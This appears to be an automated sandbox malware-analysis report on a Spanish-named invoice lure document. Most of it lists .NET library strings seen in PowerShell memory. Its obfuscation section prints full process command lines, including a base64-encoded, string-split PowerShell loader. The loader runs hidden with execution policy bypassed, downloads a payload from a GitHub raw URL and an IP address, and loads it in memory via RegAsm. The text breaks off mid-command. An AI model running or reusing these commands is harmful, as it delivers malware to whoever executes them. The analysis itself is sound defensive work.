                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000C.00000002.411646477.00000000003A9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: factura proforma .docx.docInitial sample: OLE summary lastprinted = 2024-07-15 15:30:47
                  Source: factura proforma .docx.docInitial sample: OLE indicators vbamacros = False

                  Data Obfuscation

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))"Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNh